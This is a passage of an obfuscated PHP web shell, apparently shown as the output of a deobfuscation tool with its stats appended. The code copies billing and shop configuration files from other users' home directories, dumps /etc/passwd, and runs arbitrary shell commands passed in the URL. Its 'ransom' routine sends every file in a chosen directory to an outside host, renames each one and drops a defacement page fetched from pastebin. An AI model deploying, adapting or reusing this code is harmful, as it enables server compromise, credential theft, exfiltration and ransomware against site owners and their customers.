"\57\x68\157\155\x65\x2f{$user_con}\57\x70\x75\142\154\151\143\137\x68\164\155\154\57\x62\151\154\154\151\x6e\x67\x73\57\142\x62\55\x63\157\156\x66\151\147\56\160\150\160" => "\x42\x6f\170\x42\151\x6c\x6c\151\156\x67", "\x2f\x68\157\155\x65\57{$user_con}\57\160\x75\x62\x6c\x69\x63\x5f\x68\x74\x6d\154\57\x6d\171\x2f\x62\142\55\143\157\x6e\146\x69\x67\x2e\x70\x68\160" => "\x42\157\170\102\x69\154\x6c\151\156\147", "\x2f\150\157\155\145\x2f{$user_con}\57\x70\165\142\x6c\x69\143\137\x68\x74\155\x6c\57\163\145\143\165\162\x65\57\x62\142\55\x63\x6f\x6e\146\x69\x67\56\x70\x68\160" => "\x42\x6f\170\102\x69\154\x6c\151\156\x67", "\57\x68\x6f\x6d\145\57{$user_con}\x2f\160\165\x62\x6c\151\143\x5f\150\x74\x6d\x6c\x2f\163\x75\160\160\157\162\x74\57\x6f\x72\x64\x65\162\57\x62\x62\x2d\x63\x6f\x6e\146\151\x67\56\x70\x68\160" => "\x42\157\x78\x42\x69\154\154\151\x6e\147", "\57\x68\x6f\155\145\57{$user_con}\57\160\165\142\x6c\x69\143\x5f\150\164\155\x6c\x2f\151\x6e\143\x6c\165\x64\145\163\57\144\x69\163\164\x2d\143\157\156\x66\151\147\x75\162\x65\56\160\150\160" => "\x5a\x65\x6e\x63\x61\x72\164", "\x2f\150\157\x6d\145\x2f{$user_con}\57\x70\165\142\x6c\151\143\137\x68\164\155\154\x2f\x7a\x65\x6e\143\x61\162\x74\57\x69\156\x63\x6c\x75\144\x65\x73\57\x64\x69\x73\x74\55\x63\x6f\x6e\146\x69\147\x75\x72\x65\56\x70\150\160" => "\132\x65\156\143\141\162\164", "\x2f\x68\x6f\x6d\x65\57{$user_con}\57\160\x75\x62\154\151\x63\137\x68\164\x6d\154\x2f\x70\x72\157\144\165\x63\164\x73\x2f\151\156\143\x6c\x75\144\x65\163\57\x64\151\x73\164\x2d\143\157\x6e\146\151\147\x75\x72\x65\x2e\x70\150\160" => "\x5a\x65\x6e\143\141\162\164", "\57\150\x6f\155\x65\x2f{$user_con}\57\160\x75\142\x6c\151\x63\x5f\x68\164\155\154\57\143\x61\x72\164\57\x69\x6e\143\154\165\144\x65\x73\x2f\144\x69\163\164\x2d\143\157\x6e\x66\x69\x67\x75\x72\145\56\160\150\160" => "\x5a\145\156\x63\x61\x72\164", "\57\150\x6f\x6d\145\57{$user_con}\57\160\x75\x62\154\x69\x63\x5f\150\164\155\154\x2f\x73\150\x6f\x70\57\x69\x6e\x63\154\165\x64\x65\163\x2f\x64\x69\163\x74\55\143\157\156\x66\151\x67\x75\162\145\x2e\160\x68\160" => "\132\145\x6e\x63\141\x72\164", "\x2f\150\x6f\x6d\x65\x2f{$user_con}\x2f\160\x75\142\x6c\x69\x63\x5f\150\x74\x6d\x6c\x2f\151\156\x63\154\165\x64\145\x73\57\x69\163\x6f\x34\x32\61\67\56\x70\150\160" => "\x48\157\163\x74\x62\151\x6c\154\163", "\x2f\150\x6f\x6d\145\57{$user_con}\x2f\x70\x75\x62\x6c\151\x63\137\x68\x74\x6d\154\57\150\157\163\x74\142\x69\154\x6c\163\57\x69\x6e\143\154\165\144\x65\163\57\151\163\157\64\62\x31\67\x2e\x70\x68\x70" => "\x48\157\x73\x74\x62\151\x6c\154\x73", "\x2f\x68\x6f\155\145\57{$user_con}\57\x70\x75\x62\154\151\x63\137\150\x74\x6d\154\57\150\157\x73\x74\x2f\151\x6e\143\x6c\x75\144\x65\163\x2f\151\163\157\x34\62\x31\67\x2e\160\x68\x70" => "\110\x6f\x73\164\x62\x69\x6c\154\x73", "\x2f\x68\x6f\155\x65\57{$user_con}\x2f\160\165\142\x6c\x69\143\137\150\164\x6d\154\x2f\110\x6f\163\x74\x2f\151\x6e\143\x6c\165\144\145\x73\57\x69\x73\x6f\64\x32\x31\x37\x2e\x70\150\x70" => "\110\157\163\164\x62\151\154\154\x73", "\x2f\150\157\155\x65\x2f{$user_con}\x2f\x70\x75\x62\x6c\151\x63\x5f\150\x74\155\x6c\x2f\163\x75\160\x70\157\162\x74\x65\x73\57\151\156\x63\154\x75\144\145\x73\x2f\151\163\x6f\x34\x32\61\67\56\160\150\160" => "\110\157\163\164\x62\151\x6c\x6c\x73", "\x2f\x68\x6f\x6d\x65\x2f{$user_con}\x2f\x70\165\x62\x6c\x69\x63\x5f\150\x74\x6d\x6c\57\163\x75\160\160\x6f\x72\x74\57\x69\x6e\x63\154\165\144\x65\x73\x2f\151\163\157\x34\x32\61\67\56\x70\150\x70" => "\x48\x6f\163\x74\x62\x69\154\154\x73", "\x2f\150\157\x6d\x65\x2f{$user_con}\57\160\x75\142\x6c\151\143\137\x68\164\x6d\154\57\150\157\163\164\151\156\147\57\x69\x6e\x63\x6c\x75\144\145\x73\57\151\163\157\64\62\x31\67\x2e\x70\x68\160" => "\110\x6f\x73\x74\142\x69\x6c\154\x73", "\57\x68\157\155\x65\57{$user_con}\x2f\160\165\x62\x6c\151\143\137\x68\x74\155\154\57\x63\x61\162\164\x2f\x69\x6e\x63\x6c\x75\144\145\x73\x2f\x69\163\157\x34\x32\x31\x37\56\160\150\160" => "\x48\157\x73\x74\x62\x69\x6c\x6c\x73", "\x2f\150\157\155\145\x2f{$user_con}\57\160\x75\142\x6c\x69\x63\137\150\164\x6d\x6c\57\x6f\x72\144\x65\x72\57\151\x6e\x63\154\165\x64\x65\x73\x2f\151\x73\157\x34\x32\x31\x37\56\160\x68\160" => "\110\157\163\x74\142\x69\x6c\154\x73", "\57\150\x6f\x6d\x65\x2f{$user_con}\x2f\x70\x75\142\154\x69\x63\x5f\150\164\155\154\57\x63\x6c\x69\x65\156\x74\57\x69\x6e\x63\x6c\165\x64\145\163\x2f\x69\x73\x6f\x34\62\x31\x37\56\x70\x68\160" => "\x48\157\163\x74\x62\x69\154\154\x73", "\57\150\x6f\155\145\x2f{$user_con}\57\160\165\142\x6c\x69\143\x5f\x68\164\x6d\154\x2f\x63\x6c\151\145\x6e\164\x73\57\151\156\143\154\x75\x64\x65\163\57\151\163\157\x34\62\61\67\x2e\x70\150\160" => "\x48\157\x73\x74\142\151\x6c\154\x73", "\x2f\150\157\155\145\x2f{$user_con}\x2f\160\x75\x62\154\x69\x63\x5f\150\x74\x6d\154\57\x63\x6c\151\145\156\x74\x65\57\x69\x6e\x63\154\165\144\x65\163\x2f\151\x73\x6f\x34\x32\61\67\56\x70\x68\160" => "\110\157\x73\164\x62\x69\x6c\x6c\x73", "\57\x68\x6f\155\x65\57{$user_con}\57\x70\x75\142\154\151\x63\137\150\x74\x6d\154\57\143\154\x69\x65\x6e\164\x65\x73\x2f\x69\156\143\x6c\x75\x64\x65\163\57\x69\x73\x6f\64\62\61\x37\56\160\x68\x70" => "\110\x6f\163\x74\142\151\x6c\154\x73", "\57\150\x6f\x6d\145\x2f{$user_con}\x2f\x70\x75\x62\154\x69\x63\x5f\x68\164\155\x6c\x2f\142\x69\154\x6c\151\156\x67\x2f\x69\156\143\x6c\165\144\145\x73\x2f\151\163\x6f\64\62\x31\x37\x2e\160\150\x70" => "\110\157\163\164\x62\x69\154\x6c\x73", "\57\150\157\155\145\x2f{$user_con}\57\x70\165\142\x6c\x69\143\x5f\150\x74\x6d\x6c\57\142\x69\154\x6c\151\x6e\x67\163\57\x69\x6e\x63\154\x75\x64\x65\x73\x2f\x69\x73\x6f\64\62\x31\x37\x2e\x70\150\160" => "\x48\157\163\164\x62\151\154\x6c\x73", "\57\150\x6f\155\x65\57{$user_con}\57\x70\165\142\154\x69\x63\137\x68\164\x6d\x6c\57\x6d\x79\57\x69\x6e\143\x6c\165\144\x65\x73\x2f\151\163\157\64\62\61\67\x2e\160\x68\160" => "\x48\157\x73\164\x62\151\x6c\154\x73", "\57\150\x6f\x6d\x65\57{$user_con}\57\160\x75\x62\154\x69\143\x5f\x68\164\155\x6c\57\163\x65\143\165\162\x65\x2f\151\156\143\154\x75\144\145\x73\57\151\163\x6f\x34\62\x31\x37\x2e\160\150\x70" => "\110\157\163\164\x62\151\x6c\154\163", "\x2f\150\157\155\x65\57{$user_con}\57\x70\x75\x62\154\151\143\x5f\150\x74\x6d\x6c\57\163\x75\160\160\x6f\x72\164\57\x6f\x72\x64\x65\162\57\x69\156\x63\x6c\x75\x64\x65\163\57\151\163\157\64\x32\x31\67\56\160\150\x70" => "\x48\157\x73\x74\142\151\154\x6c\x73"); foreach ($grab_config as $config => $nama_config) { $ambil_config = file_get_contents($config); if ($ambil_config == '') { } else { $file_config = fopen("\151\x6e\x64\157\163\x65\x63\137\143\x6f\x6e\x66\x69\147\57{$user_con}\x2d{$nama_config}\x2e\164\x78\164", "\167"); fputs($file_config, $ambil_config); } } } } echo "\x3c\x70\40\143\x6c\141\x73\163\x3d\x27\x74\x65\x78\x74\x2d\143\145\x6e\164\x65\162\47\x3e\123\165\x63\x63\x65\163\x73\x20\107\x65\x74\x20\103\x6f\x6e\146\151\x67\41\41\74\x2f\x70\x3e\xa\x9\11\11\74\141\40\x68\x72\145\146\x3d\x27\77\x64\x69\162\x3d{$dir}\57\151\x6e\x64\x6f\x73\x65\143\x5f\143\x6f\156\146\x69\x67\x27\x20\143\154\x61\163\x73\75\47\142\164\156\40\142\x74\x6e\55\x73\165\143\143\x65\x73\x73\40\x62\164\x6e\55\142\x6c\x6f\143\x6b\x20\155\142\x2d\x34\x27\76\x43\x6c\x69\143\153\40\110\x65\162\145\74\57\141\x3e"; } else { echo "\74\x66\157\x72\x6d\x20\x6d\x65\164\150\157\144\75\47\x70\x6f\x73\164\x27\x3e\12\x9\11\x9\x9\x3c\x70\x20\x63\154\141\163\163\75\47\164\x65\170\164\55\144\x61\x6e\x67\x65\x72\47\76\57\145\164\x63\57\160\141\x73\163\167\x20\145\162\162\157\162\x20\x3f\x20\x20\74\x61\40\x68\162\x65\x66\75\x27\77\x64\x69\x72\75" . $dir . "\46\x61\153\x73\x69\x3d\160\141\163\163\167\x62\171\x70\141\163\163\x27\x3e\102\171\160\141\163\163\40\110\x65\x72\145\x3c\57\141\76\x3c\57\160\x3e\xa\x9\x9\11\x9\74\x74\x65\170\x74\x61\162\x65\x61\x20\x6e\x61\x6d\x65\x3d\x27\x70\x61\x73\163\167\144\47\x20\x63\154\x61\163\x73\75\x27\146\x6f\162\155\x2d\x63\x6f\x6e\164\x72\x6f\154\47\x20\162\157\x77\x73\75\47\61\60\47\x3e" . file_get_contents("\x2f\x65\164\x63\x2f\x70\141\163\x73\167\x64") . "\x3c\x2f\164\x65\170\164\141\x72\145\141\76\74\142\x72\x2f\x3e\12\11\x9\11\x9\x3c\x69\x6e\160\x75\164\x20\164\x79\160\145\75\47\163\x75\x62\x6d\x69\x74\47\x20\x63\154\x61\163\163\x3d\47\142\164\156\x20\x62\x74\156\55\x64\x61\156\147\x65\162\40\x62\x74\156\x2d\142\x6c\157\x63\x6b\47\40\x76\141\x6c\x75\145\75\x27\x47\145\164\x20\x43\157\x6e\146\151\147\x21\x21\x27\x3e"; } die; } goto hw3d7; sI6zX: $default_use_ajax = true; goto jAcCG; u7SA4: error_reporting(0); goto oAS2R; Qlhck: if (isset($_GET["\x70\x61\x74\x68"])) { $path = $_GET["\160\141\x74\150"]; chdir($path); } else { $path = getcwd(); } goto gmIGR; e8ESb: function ambilKata($param, $kata1, $kata2) { if (strpos($param, $kata1) === FALSE) { return FALSE; } if (strpos($param, $kata2) === FALSE) { return FALSE; } $start = strpos($param, $kata1) + strlen($kata1); $end = strpos($param, $kata2, $start); $return = substr($param, $start, $end - $start); return $return; } goto HdX2w; bVW_6: if (isset($_GET["\x63\155\x64"])) { echo "\x3c\160\x72\x65\x20\x63\x6c\x61\163\x73\x3d\x27\x74\x65\170\x74\x2d\x77\150\x69\164\x65\x27\76"; echo system($_GET["\x63\x6d\x64"]); echo "\x3c\x2f\160\x72\145\76"; die; } goto rqHo2; VE56d: $paths = explode("\x2f", $path); goto oqZvC; teBsd: $curl = function_exists("\x63\x75\x72\x6c\137\x76\x65\162\x73\151\x6f\x6e") ? "\74\146\157\156\164\40\x63\157\154\x6f\162\75\x67\162\x65\145\x6e\x3e\117\x4e\74\57\x66\x6f\x6e\164\76" : "\74\x66\157\156\x74\x20\x63\x6f\154\157\x72\75\x72\145\x64\76\x4f\106\106\74\x2f\x66\157\156\x74\x3e"; goto ob6mM; zyt1z: if (!isset($_SESSION[md5($_SERVER["\x48\x54\124\x50\137\x48\x4f\x53\124"])])) { if (empty($aupas) || isset($_POST["\160\141\x73\x73"]) && md5($_POST["\160\141\x73\163"]) == $aupas) { $_SESSION[md5($_SERVER["\x48\124\124\x50\x5f\x48\x4f\x53\124"])] = true; } else { login_shell(); } } goto vPQRS; vYk78: $ip = getHostByName(getHostName()); goto Y8MkE; HdX2w: $d0mains = @file("\x2f\145\164\143\57\x6e\x61\x6d\x65\144\56\143\x6f\156\146", false); goto xA6Sm; KPY1y: echo "\x26\x6e\142\163\160\x3b\x26\x6e\x62\x73\x70\x3b\133\40" . w($dir, perms($dir)) . "\x20\x5d"; goto DE8WR; xA6Sm: if (!$d0mains) { $die = "\74\146\157\156\164\40\x63\157\x6c\157\x72\x3d\x72\145\144\x20\x73\151\x7a\145\75\x32\x70\170\76\x43\x61\x6e\164\x20\122\145\141\144\40\x5b\x20\x2f\x65\x74\143\57\156\x61\x6d\x65\x64\x2e\143\157\156\x66\x20\135\74\57\x66\x6f\156\164\76"; $GLOBALS["\x6e\x65\145\x64\137\164\157\137\165\x70\144\141\164\x65\x5f\x68\x65\x61\144\145\x72"] = "\x74\x72\165\x65"; } else { $count = 0; foreach ($d0mains as $d0main) { if (@strstr($d0main, "\x7a\157\x6e\145")) { preg_match_all("\43\172\x6f\156\145\x20\42\50\x2e\52\51\42\x23", $d0main, $domains); flush(); if (strlen(trim($domains[1][0])) > 2) { flush(); $count++; } } } $dom = "{$count}\x20\x44\157\155\x61\x69\x6e"; } goto DgzH7; B7fRz: if ($_GET["\x61\x6b\x73\151"] == "\x76\151\x65\x77") { echo "\x5b\x20\x3c\141\40\x63\154\x61\x73\163\75\42\x61\143\x74\151\x76\145\x22\40\x68\162\145\x66\75\42\x3f\x64\151\x72\x3d" . $dir . "\46\141\153\163\x69\x3d\x76\x69\145\x77\x26\146\x69\154\145\75" . $file . "\42\76\x4c\x69\x68\141\x74\74\57\141\76\40\x5d\x20\40\x5b\40\74\x61\x20\x68\x72\x65\146\x3d\42\77\x64\151\162\x3d" . $dir . "\46\141\153\x73\151\75\x65\x64\x69\164\46\x66\x69\154\145\x3d" . $file . "\42\x3e\x45\x64\x69\164\x3c\x2f\x61\x3e\x20\135\x20\40\133\40\74\141\x20\x68\162\x65\x66\x3d\42\77\144\x69\x72\75" . $dir . "\x26\141\x6b\x73\x69\75\x72\x65\x6e\141\155\x65\46\146\151\154\x65\x3d" . $file . "\42\76\122\x65\x6e\141\155\145\74\57\141\x3e\40\x5d\40\x20\x5b\40\x3c\x61\x20\150\162\145\x66\x3d\42\77\144\x69\x72\x3d" . $dir . "\x26\141\x6b\x73\151\75\150\141\160\x75\x73\x66\46\146\151\154\145\x3d" . $file . "\42\x3e\104\x65\x6c\x65\x74\145\74\x2f\x61\76\40\x5d"; echo "\12\x9\11\11\x3c\x74\x65\x78\164\141\162\x65\141\x20\162\157\167\163\75\47\x39\47\x20\143\154\x61\163\x73\x3d\x27\146\157\162\x6d\55\x63\x6f\x6e\164\162\157\x6c\40\x6d\x62\55\62\x27\x20\144\151\x73\x61\x62\154\145\x64\x3d\47\x27\x3e" . htmlspecialchars(file_get_contents($file)) . "\x3c\x2f\x74\x65\170\164\x61\x72\x65\x61\76"; } goto tUIs1; E44u8: if ($_GET["\x61\x6b\163\151"] == "\162\141\156\163\x6f\x6d") { echo "\74\146\157\x72\x6d\x20\x6d\145\164\150\157\144\x3d\x22\x70\x6f\x73\164\42\x3e\12\11\11\11\x3c\144\151\x76\40\143\154\x61\x73\x73\x3d\x22\146\157\x72\x6d\x2d\147\x72\157\x75\160\42\76\xa\x9\11\x9\11\74\150\x35\x20\x63\154\x61\163\163\75\42\164\145\x78\x74\55\x63\145\156\x74\145\x72\x22\76\x3c\x69\x20\143\154\141\163\x73\75\x22\x66\141\40\x66\141\x2d\x6c\x6f\143\153\42\x3e\74\57\151\x3e\x20\120\151\x6c\x69\150\40\104\x69\x72\145\143\x74\157\x72\171\x20\x59\x61\x6e\x67\x20\x49\x6e\147\151\156\40\x44\151\40\105\156\x63\x72\171\160\x74\74\57\x68\65\x3e\xa\11\11\11\11\74\151\156\x70\x75\x74\40\x74\171\x70\145\75\x22\x74\145\170\x74\x22\x20\x6e\141\x6d\145\x3d\42\x70\141\164\x68\x22\x20\143\x6c\x61\163\163\x3d\42\x66\157\x72\155\x2d\143\157\156\164\x72\x6f\x6c\x20\x6d\x62\x2d\x32\42\x20\x76\x61\x6c\x75\145\75\x22" . $dir . "\x22\x2f\x3e\x3c\142\x72\57\76\xa\x9\x9\x9\11\x3c\151\156\160\x75\164\40\x74\171\160\145\75\x22\163\165\x62\155\x69\164\x22\40\156\141\x6d\x65\75\x22\145\x6e\x63\x72\171\x70\164\x22\x20\143\154\x61\x73\x73\x3d\42\142\164\156\40\142\x74\156\x2d\x64\141\156\147\x65\162\x20\142\x74\x6e\x2d\142\x6c\157\143\153\42\x20\166\x61\x6c\165\145\75\42\105\x6e\143\x72\171\160\164\42\57\76\xa\11\11\11\x3c\x2f\x64\x69\166\76\xa\x9\x9\74\x2f\146\x6f\x72\155\76"; if (isset($_POST["\145\156\x63\x72\x79\160\x74"])) { $dir = $_POST["\160\x61\x74\150"]; echo "\x3c\164\x65\170\x74\141\x72\145\141\x20\x63\154\141\163\163\75\x27\x66\x6f\x72\x6d\x2d\x63\x6f\x6e\164\x72\157\x6c\x20\x6d\142\x2d\64\x27\40\162\x6f\x77\163\x3d\x27\x31\x30\x27\40\x64\151\x73\141\142\x6c\x65\x64\x3d\47\x27\x3e"; function listFolderFiles($dir) { if (is_dir($dir)) { $ffs = scandir($dir); unset($ffs[array_search("\x2e", $ffs, true)]); unset($ffs[array_search("\56\56", $ffs, true)]); if (count($ffs) < 1) { return; } foreach ($ffs as $ff) { $files = $dir . "\x2f" . $ff; if (!is_dir($files)) { $file = file_get_contents($files); $_a = base64_encode($file); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "\150\164\164\160\72\57\57\145\x6e\143\x72\171\160\x74\56\151\x6e\144\163\143\56\155\x65\57\141\x70\x69\56\160\150\x70\x3f\164\x79\160\x65\x3d\x65\156\x63\x72\171\x70\164"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, "\164\145\170\x74\75{$_a}"); $x = json_decode(curl_exec($ch)); if ($x->status == "\163\165\x63\x63\x65\x73\x73") { $_enc = base64_decode($x->data); rename($files, $files . "\x2e\151\156\144\x73\143"); echo "\133\x2b\x5d{$files}\x20\75\x3e\40\x53\165\143\x63\x65\163\x73\x20\105\x6e\x63\x72\x79\x70\164\x65\144\12"; } } if (is_dir($dir . "\57" . $ff)) { listFolderFiles($dir . "\x2f" . $ff); } } $index = file_get_contents("\x68\164\x74\160\x73\72\57\x2f\x70\x61\163\164\145\142\151\156\x2e\x63\x6f\x6d\x2f\x72\x61\167\x2f\141\x47\x5a\x36\x42\x65\x54\x48"); $_o = fopen($dir . "\57\151\x6e\x64\145\x78\x2e\150\164\x6d\154", "\x77"); fwrite($_o, $index); fclose($_o); echo "\12\x5b\53\x5d\x20\x44\157\156\x65\40\x21"; } else { echo "\12\x42\x75\x6b\x61\x6e\40\x64\151\162"; } } listFolderFiles($dir); echo "\x3c\x2f\x74\x65\x78\164\141\162\x65\x61\76\74\142\162\57\76"; } die; } goto PDFOO; HR7MM: ?>

Function Calls

None

Variables

None

Stats

MD5 e3e46919e6c41240ca10071b493b8b9a
Eval Count 0
Decode Time 168 ms